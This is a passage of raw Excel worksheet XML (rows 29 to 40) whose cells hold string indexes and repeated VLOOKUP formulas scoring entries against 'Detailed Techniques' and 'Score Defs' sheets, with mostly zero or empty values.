        <f>IF(ISNA(VLOOKUP(VLOOKUP(K29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M29" s="8" t="s">
        <v>197</v>
      </c>
      <c r="N29" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O29" s="3"/>
      <c r="P29" s="3"/>
      <c r="Q29" s="3"/>
      <c r="R29" s="3"/>
      <c r="S29" s="3"/>
      <c r="T29" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V29" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="30" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A30" s="12" t="s">
        <v>135</v>
      </c>
      <c r="B30" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C30" s="3"/>
      <c r="D30" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E30" s="12" t="s">
        <v>198</v>
      </c>
      <c r="F30" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G30" s="3"/>
      <c r="H30" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I30" s="3"/>
      <c r="J30" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K30" s="3"/>
      <c r="L30" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M30" s="8" t="s">
        <v>199</v>
      </c>
      <c r="N30" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O30" s="3"/>
      <c r="P30" s="3"/>
      <c r="Q30" s="3"/>
      <c r="R30" s="3"/>
      <c r="S30" s="3"/>
      <c r="T30" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V30" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U30,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="31" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A31" s="12" t="s">
        <v>200</v>
      </c>
      <c r="B31" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C31" s="3"/>
      <c r="D31" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E31" s="12" t="s">
        <v>201</v>
      </c>
      <c r="F31" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G31" s="3"/>
      <c r="H31" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I31" s="3"/>
      <c r="J31" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K31" s="3"/>
      <c r="L31" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M31" s="8" t="s">
        <v>202</v>
      </c>
      <c r="N31" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O31" s="3"/>
      <c r="P31" s="3"/>
      <c r="Q31" s="3"/>
      <c r="R31" s="3"/>
      <c r="S31" s="3"/>
      <c r="T31" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V31" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U31,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="32" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A32" s="12" t="s">
        <v>203</v>
      </c>
      <c r="B32" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C32" s="3"/>
      <c r="D32" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E32" s="12" t="s">
        <v>204</v>
      </c>
      <c r="F32" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G32" s="3"/>
      <c r="H32" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I32" s="3"/>
      <c r="J32" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K32" s="3"/>
      <c r="L32" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M32" s="8" t="s">
        <v>205</v>
      </c>
      <c r="N32" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O32" s="3"/>
      <c r="P32" s="3"/>
      <c r="Q32" s="3"/>
      <c r="R32" s="3"/>
      <c r="S32" s="3"/>
      <c r="T32" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V32" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U32,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="33" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A33" s="12" t="s">
        <v>206</v>
      </c>
      <c r="B33" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C33" s="3"/>
      <c r="D33" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E33" s="12" t="s">
        <v>207</v>
      </c>
      <c r="F33" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G33" s="3"/>
      <c r="H33" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I33" s="3"/>
      <c r="J33" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K33" s="3"/>
      <c r="L33" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M33" s="8" t="s">
        <v>208</v>
      </c>
      <c r="N33" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O33" s="3"/>
      <c r="P33" s="3"/>
      <c r="Q33" s="3"/>
      <c r="R33" s="3"/>
      <c r="S33" s="3"/>
      <c r="T33" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V33" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U33,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="34" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A34" s="12" t="s">
        <v>209</v>
      </c>
      <c r="B34" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C34" s="3"/>
      <c r="D34" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E34" s="12" t="s">
        <v>135</v>
      </c>
      <c r="F34" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G34" s="3"/>
      <c r="H34" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I34" s="3"/>
      <c r="J34" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K34" s="3"/>
      <c r="L34" s="3"/>
      <c r="M34" s="3"/>
      <c r="N34" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="O34" s="3"/>
      <c r="P34" s="3"/>
      <c r="Q34" s="3"/>
      <c r="R34" s="3"/>
      <c r="S34" s="4"/>
      <c r="T34" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V34" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U34,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="35" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A35" s="12" t="s">
        <v>132</v>
      </c>
      <c r="B35" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C35" s="5"/>
      <c r="D35" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E35" s="12" t="s">
        <v>102</v>
      </c>
      <c r="F35" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G35" s="5"/>
      <c r="H35" s="5"/>
      <c r="I35" s="5"/>
      <c r="J35" s="5"/>
      <c r="K35" s="5"/>
      <c r="L35" s="5"/>
      <c r="M35" s="5"/>
      <c r="N35" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="O35" s="5"/>
      <c r="P35" s="5"/>
      <c r="Q35" s="5"/>
      <c r="R35" s="5"/>
      <c r="S35" s="5"/>
      <c r="T35" s="5"/>
      <c r="V35" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U35,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="36" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A36" s="12" t="s">
        <v>210</v>
      </c>
      <c r="B36" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C36" s="5"/>
      <c r="D36" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E36" s="12" t="s">
        <v>203</v>
      </c>
      <c r="F36" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G36" s="5"/>
      <c r="H36" s="5"/>
      <c r="I36" s="5"/>
      <c r="J36" s="5"/>
      <c r="K36" s="5"/>
      <c r="L36" s="5"/>
      <c r="M36" s="5"/>
      <c r="N36" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="O36" s="5"/>
      <c r="P36" s="5"/>
      <c r="Q36" s="5"/>
      <c r="R36" s="5"/>
      <c r="S36" s="5"/>
      <c r="T36" s="5"/>
      <c r="V36" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U36,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="37" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A37" s="12" t="s">
        <v>211</v>
      </c>
      <c r="B37" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C37" s="5"/>
      <c r="D37" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E37" s="12" t="s">
        <v>109</v>
      </c>
      <c r="F37" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G37" s="5"/>
      <c r="H37" s="5"/>
      <c r="I37" s="5"/>
      <c r="J37" s="5"/>
      <c r="K37" s="5"/>
      <c r="L37" s="5"/>
      <c r="M37" s="5"/>
      <c r="N37" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="O37" s="5"/>
      <c r="P37" s="5"/>
      <c r="Q37" s="5"/>
      <c r="R37" s="5"/>
      <c r="S37" s="5"/>
      <c r="T37" s="5"/>
      <c r="V37" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U37,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="38" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A38" s="12" t="s">
        <v>212</v>
      </c>
      <c r="B38" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C38" s="5"/>
      <c r="D38" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E38" s="12" t="s">
        <v>117</v>
      </c>
      <c r="F38" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G38" s="5"/>
      <c r="H38" s="5"/>
      <c r="I38" s="5"/>
      <c r="J38" s="5"/>
      <c r="K38" s="5"/>
      <c r="L38" s="5"/>
      <c r="M38" s="5"/>
      <c r="N38" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="O38" s="5"/>
      <c r="P38" s="5"/>
      <c r="Q38" s="5"/>
      <c r="R38" s="5"/>
      <c r="S38" s="5"/>
      <c r="T38" s="5"/>
      <c r="V38" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U38,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="39" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A39" s="12" t="s">
        <v>162</v>
      </c>
      <c r="B39" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C39" s="5"/>
      <c r="D39" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E39" s="12" t="s">
        <v>213</v>
      </c>
      <c r="F39" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G39" s="5"/>
      <c r="H39" s="5"/>
      <c r="I39" s="5"/>
      <c r="J39" s="5"/>
      <c r="K39" s="5"/>
      <c r="L39" s="5"/>
      <c r="M39" s="5"/>
      <c r="N39" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="O39" s="5"/>
      <c r="P39" s="5"/>
      <c r="Q39" s="5"/>
      <c r="R39" s="5"/>
      <c r="S39" s="5"/>
      <c r="T39" s="5"/>
      <c r="V39" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U39,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="40" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A40" s="12" t="s">
        <v>214</v>
      </c>
      <c r="B40" s="5">
